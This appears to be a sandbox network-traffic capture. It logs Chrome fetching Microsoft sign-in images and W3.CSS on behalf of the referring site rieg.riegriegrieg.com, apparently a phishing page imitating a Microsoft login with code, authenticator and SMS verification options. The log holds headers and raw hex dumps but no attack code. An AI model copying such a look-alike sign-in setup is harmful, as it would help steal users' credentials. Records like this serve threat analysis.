                                                                              Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.449750192.229.133.2214435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC550OUTGET /w3css/4/w3.css HTTP/1.1
                                                                              Host: www.w3schools.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: text/css,*/*;q=0.1
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: style
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC581INHTTP/1.1 200 OK
                                                                              Age: 338210
                                                                              Cache-Control: public,max-age=31536000,public
                                                                              Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                              Content-Type: text/css
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Etag: "0a29a965824db1:0+gzip+ident"
                                                                              Last-Modified: Tue, 22 Oct 2024 08:01:24 GMT
                                                                              Server: ECS (lhd/35B3)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: HIT
                                                                              X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                              X-Powered-By: ASP.NET
                                                                              Content-Length: 23427
                                                                              Connection: close
                                                                              2024-10-26 06:48:48 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                                              Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                                              2024-10-26 06:48:48 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                                              Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.449754152.199.21.1754435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:48 UTC665OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                              Host: aadcdn.msftauth.net
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:48 UTC738INHTTP/1.1 200 OK
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Age: 18580500
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                              Content-Type: image/svg+xml
                                                                              Date: Sat, 26 Oct 2024 06:48:48 GMT
                                                                              Etag: 0x8DB5C3F4AC59B47
                                                                              Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                              Server: ECAcc (lhc/78BB)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: HIT
                                                                              x-ms-blob-type: BlockBlob
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                              x-ms-version: 2009-09-19
                                                                              Content-Length: 1636
                                                                              Connection: close
                                                                              2024-10-26 06:48:48 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.44976313.107.246.604435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:49 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:49 UTC799INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:49 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 673
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                              ETag: 0x8DB5C3F47E260FD
                                                                              x-ms-request-id: c9c40271-601e-006d-06aa-26771d000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064849Z-16849878b786jv8w2kpaf5zkqs00000000m0000000004ywh
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:49 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.44976413.107.246.454435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:49 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                              Host: logincdn.msauth.net
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:49 UTC786INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:49 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 276
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                              ETag: 0x8D79ED35591CF44
                                                                              x-ms-request-id: 3047874e-901e-003c-2073-279d2e000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064849Z-r197bdfb6b4wmcgqdschtyp7yg00000001g0000000007zm1
                                                                              x-fd-int-roxy-purgeid: 67912908
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:49 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                              Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.44976213.107.246.604435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:49 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:49 UTC779INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:49 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 1435
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                              ETag: 0x8DB5C3F4911527F
                                                                              x-ms-request-id: fc914089-601e-0028-6ad6-26d541000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064849Z-r197bdfb6b4c8q4qvwwy2byzsw00000001zg0000000007am
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:49 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                              Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.44976513.107.246.604435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:49 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:49 UTC779INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:49 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 2407
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                              ETag: 0x8DB5C3F499A9B99
                                                                              x-ms-request-id: 7677466b-301e-002d-2c36-277025000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064849Z-16849878b78bcpfn2qf7sm6hsn0000000390000000007q2h
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:49 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                              Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.44976613.107.246.604435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:49 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                              Host: aadcdn.msauth.net
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:49 UTC799INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:48:49 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 199
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                              ETag: 0x8DB5C3F49C21D98
                                                                              x-ms-request-id: 68cfccad-301e-0060-296f-26bfc9000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20241026T064849Z-16849878b78q4pnrt955f8nkx80000000a4000000000k7ze
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:48:49 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                              Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.449773152.199.21.1754435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:48:52 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                              Host: aadcdn.msftauth.net
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:48:53 UTC738INHTTP/1.1 200 OK
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Age: 18580505
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                              Content-Type: image/svg+xml
                                                                              Date: Sat, 26 Oct 2024 06:48:53 GMT
                                                                              Etag: 0x8DB5C3F4AC59B47
                                                                              Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                              Server: ECAcc (lhc/78BB)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: HIT
                                                                              x-ms-blob-type: BlockBlob
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                              x-ms-version: 2009-09-19
                                                                              Content-Length: 1636
                                                                              Connection: close
                                                                              2024-10-26 06:48:53 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              24192.168.2.44977713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:24 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:24 UTC540INHTTP/1.1 200 OK
